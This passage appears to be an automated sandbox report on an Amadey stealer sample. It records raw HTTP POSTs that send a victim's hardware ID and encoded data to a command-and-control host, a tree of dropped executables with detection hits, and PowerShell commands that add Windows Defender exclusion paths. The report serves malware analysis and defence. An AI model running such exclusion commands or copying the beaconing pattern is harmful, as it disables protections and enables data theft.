                                                                                                                                                                                                                                        2024-12-19 05:10:03 UTC1369INData Raw: 6b 74 31 6d 31 4c 73 37 31 30 46 45 5a 57 68 4d 45 41 4d 50 77 71 6b 73 75 6b 67 42 69 43 31 7a 72 38 64 65 4b 53 68 6e 76 6f 72 79 75 5a 59 30 58 38 2b 32 78 31 56 46 43 45 2b 6c 38 77 76 44 71 59 30 4d 54 51 51 64 79 43 4d 36 4d 68 68 59 72 42 49 71 7a 78 66 49 52 6a 55 2f 79 36 4c 7a 38 55 47 4d 66 6f 54 54 66 61 56 4f 32 46 6c 6f 49 41 6e 4d 63 6a 6f 68 62 7a 76 62 39 45 36 37 77 79 6d 43 51 64 72 62 31 69 62 51 6c 65 6e 4d 63 4f 4f 4b 52 56 68 4d 75 4a 77 30 37 4d 35 53 2f 6a 4e 73 4b 4b 6b 44 66 5a 73 54 75 58 4e 52 75 72 38 6d 4d 44 4d 44 2b 45 73 41 35 32 70 44 4b 59 78 64 47 48 42 38 79 49 66 4c 39 6a 6b 4d 2f 57 4b 71 79 67 63 6f 39 6a 48 66 79 6c 66 6d 4e 47 44 49 53 6d 44 6a 66 6e 65 4e 69 4e 6b 70 55 56 79 2b 34 53 79 6a 62 43 6e 5a 64 71 38
                                                                                                                                                                                                                                        Data Ascii: kt1m1Ls710FEZWhMEAMPwqksukgBiC1zr8deKShnvoryuZY0X8+2x1VFCE+l8wvDqY0MTQQdyCM6MhhYrBIqzxfIRjU/y6Lz8UGMfoTTfaVO2FloIAnMcjohbzvb9E67wymCQdrb1ibQlenMcOOKRVhMuJw07M5S/jNsKKkDfZsTuXNRur8mMDMD+EsA52pDKYxdGHB8yIfL9jkM/WKqygco9jHfylfmNGDISmDjfneNiNkpUVy+4SyjbCnZdq8


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        4192.168.2.449904104.21.66.854431464C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-12-19 05:10:06 UTC270OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=0H1DHIFZ
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                        Content-Length: 18106
                                                                                                                                                                                                                                        Host: aspecteirs.lat
                                                                                                                                                                                                                                        2024-12-19 05:10:06 UTC15331OUTData Raw: 2d 2d 30 48 31 44 48 49 46 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 41 31 43 34 44 31 32 30 38 30 45 46 36 37 42 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 30 48 31 44 48 49 46 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 30 48 31 44 48 49 46 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 56 6d 72 30 74 2d 2d 69 6e 73 74 61 6c 6c 73 0d 0a 2d 2d 30 48 31 44 48 49 46 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f
                                                                                                                                                                                                                                        Data Ascii: --0H1DHIFZContent-Disposition: form-data; name="hwid"1A1C4D12080EF67BAC8923850305D13E--0H1DHIFZContent-Disposition: form-data; name="pid"2--0H1DHIFZContent-Disposition: form-data; name="lid"CVmr0t--installs--0H1DHIFZContent-Dispo
                                                                                                                                                                                                                                        2024-12-19 05:10:06 UTC2775OUTData Raw: b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52 9c ab a6 b6 5f c9 35 8b 56 2d 7b 91
                                                                                                                                                                                                                                        Data Ascii: f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR_5V-{
                                                                                                                                                                                                                                        2024-12-19 05:10:07 UTC1134INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Date: Thu, 19 Dec 2024 05:10:07 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=mu5lbg38vpkouruqkpt8sl8ism; expires=Sun, 13 Apr 2025 22:56:45 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5ENb1CC8tOqV4KH%2B0zQ5xIKh2RjhQ0Ttj%2BI1cmua5RoTrn%2BeoUxCMuZcNpfqMmZwclIrnhVQd8spU4xtcEC%2BGRXnL%2BJxqHKSCJIA0Y2MicPxKydKWzz3K5QufrUJHCF18g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                        CF-RAY: 8f44e262eb9241cd-EWR
                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1710&min_rtt=1701&rtt_var=657&sent=17&recv=23&lost=0&retrans=0&sent_bytes=2831&recv_bytes=19056&delivery_rate=1641371&cwnd=227&unsent_bytes=0&cid=5749e46b2f67cd3c&ts=1178&x=0"
                                                                                                                                                                                                                                        2024-12-19 05:10:07 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                        2024-12-19 05:10:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        5192.168.2.449915104.21.66.854431464C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-12-19 05:10:09 UTC271OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=HXWSW5Y24I
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                        Content-Length: 8739
                                                                                                                                                                                                                                        Host: aspecteirs.lat
                                                                                                                                                                                                                                        2024-12-19 05:10:09 UTC8739OUTData Raw: 2d 2d 48 58 57 53 57 35 59 32 34 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 41 31 43 34 44 31 32 30 38 30 45 46 36 37 42 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 48 58 57 53 57 35 59 32 34 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 48 58 57 53 57 35 59 32 34 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 56 6d 72 30 74 2d 2d 69 6e 73 74 61 6c 6c 73 0d 0a 2d 2d 48 58 57 53 57 35 59 32 34 49 0d 0a 43 6f 6e 74 65
                                                                                                                                                                                                                                        Data Ascii: --HXWSW5Y24IContent-Disposition: form-data; name="hwid"1A1C4D12080EF67BAC8923850305D13E--HXWSW5Y24IContent-Disposition: form-data; name="pid"2--HXWSW5Y24IContent-Disposition: form-data; name="lid"CVmr0t--installs--HXWSW5Y24IConte
                                                                                                                                                                                                                                        2024-12-19 05:10:10 UTC1137INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Date: Thu, 19 Dec 2024 05:10:09 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=a6roq83rimi8d22pkbvcvct3e9; expires=Sun, 13 Apr 2025 22:56:48 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gb7BI2%2FYVxVV0lr%2B7PC9bNSlFBxGBcTBX%2FST6qATFXp9CNsGCVQ%2B0Arrx4vM4XrnQ0itZPo5pdjbXmG7E0GEbA1rw%2BER9nWDcqimejIFz7sJfPl%2Bp9ed9ob%2FXfH%2FAsUHUQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                        CF-RAY: 8f44e274efab0fa1-EWR
                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1567&min_rtt=1565&rtt_var=592&sent=7&recv=15&lost=0&retrans=0&sent_bytes=2832&recv_bytes=9668&delivery_rate=1842271&cwnd=252&unsent_bytes=0&cid=12b65a48fc51278d&ts=849&x=0"
                                                                                                                                                                                                                                        2024-12-19 05:10:10 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                        2024-12-19 05:10:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                                                        Start time:00:08:02
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                                                                                        Imagebase:0x7e0000
                                                                                                                                                                                                                                        File size:2'976'768 bytes
                                                                                                                                                                                                                                        MD5 hash:61CB850896F4B6AAC18C72E82EB9AC90
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.1753888094.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.1713621110.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:1
                                                                                                                                                                                                                                        Start time:00:08:05
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        Imagebase:0xb70000
                                                                                                                                                                                                                                        File size:2'976'768 bytes
                                                                                                                                                                                                                                        MD5 hash:61CB850896F4B6AAC18C72E82EB9AC90
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000003.1739503625.0000000004B40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000002.1780180003.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                        • Detection: 47%, ReversingLabs
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:2
                                                                                                                                                                                                                                        Start time:00:08:05
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                                                                                                                                                                                                                        Imagebase:0xb70000
                                                                                                                                                                                                                                        File size:2'976'768 bytes
                                                                                                                                                                                                                                        MD5 hash:61CB850896F4B6AAC18C72E82EB9AC90
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.1782523187.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.1741888657.0000000004AD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:6
                                                                                                                                                                                                                                        Start time:00:09:00
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                        Imagebase:0xb70000
                                                                                                                                                                                                                                        File size:2'976'768 bytes
                                                                                                                                                                                                                                        MD5 hash:61CB850896F4B6AAC18C72E82EB9AC90
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000003.2282737175.00000000046D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Target ID:7
                                                                                                                                                                                                                                        Start time:00:09:13
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exe"
                                                                                                                                                                                                                                        Imagebase:0x8f0000
                                                                                                                                                                                                                                        File size:1'114'112 bytes
                                                                                                                                                                                                                                        MD5 hash:EF08A45833A7D881C90DED1952F96CB4
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:9
                                                                                                                                                                                                                                        Start time:00:09:20
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exe"
                                                                                                                                                                                                                                        Imagebase:0xf40000
                                                                                                                                                                                                                                        File size:1'114'112 bytes
                                                                                                                                                                                                                                        MD5 hash:EF08A45833A7D881C90DED1952F96CB4
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000002.2486574208.0000000003543000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000002.2499361350.0000000005A90000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000002.2486574208.0000000003321000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000002.2494620815.0000000004321000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:11
                                                                                                                                                                                                                                        Start time:00:09:22
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exe"
                                                                                                                                                                                                                                        Imagebase:0x1d0000
                                                                                                                                                                                                                                        File size:1'102'336 bytes
                                                                                                                                                                                                                                        MD5 hash:68C0E4EEFD4C6A76CFF542EF57A49CA2
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:12
                                                                                                                                                                                                                                        Start time:00:09:28
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exe"
                                                                                                                                                                                                                                        Imagebase:0x3b0000
                                                                                                                                                                                                                                        File size:1'102'336 bytes
                                                                                                                                                                                                                                        MD5 hash:68C0E4EEFD4C6A76CFF542EF57A49CA2
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:13
                                                                                                                                                                                                                                        Start time:00:09:28
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exe"
                                                                                                                                                                                                                                        Imagebase:0x720000
                                                                                                                                                                                                                                        File size:1'102'336 bytes
                                                                                                                                                                                                                                        MD5 hash:68C0E4EEFD4C6A76CFF542EF57A49CA2
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000D.00000002.2579288387.0000000003AB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000D.00000002.2583286972.0000000005260000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000D.00000002.2573081196.0000000002ABA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:14
                                                                                                                                                                                                                                        Start time:00:09:35
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe"
                                                                                                                                                                                                                                        Imagebase:0x8b0000
                                                                                                                                                                                                                                        File size:21'504 bytes
                                                                                                                                                                                                                                        MD5 hash:14BECDF1E2402E9AA6C2BE0E6167041E
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                        • Detection: 11%, ReversingLabs
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:15
                                                                                                                                                                                                                                        Start time:00:09:35
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:16
                                                                                                                                                                                                                                        Start time:00:09:37
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"powershell.exe" Add-MpPreference -ExclusionPath "C:\unrlkpjy"
                                                                                                                                                                                                                                        Imagebase:0xd90000
                                                                                                                                                                                                                                        File size:433'152 bytes
                                                                                                                                                                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:17
                                                                                                                                                                                                                                        Start time:00:09:37
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:19
                                                                                                                                                                                                                                        Start time:00:09:43
                                                                                                                                                                                                                                        Start date:19/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData"
                                                                                                                                                                                                                                        Imagebase:0xd90000
                                                                                                                                                                                                                                        File size:433'152 bytes
                                                                                                                                                                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:20
                                                                                                                                                                                                                                        Start time:00:09:43
                                                                                                                                                                                                                                        Start date:19/12/2024
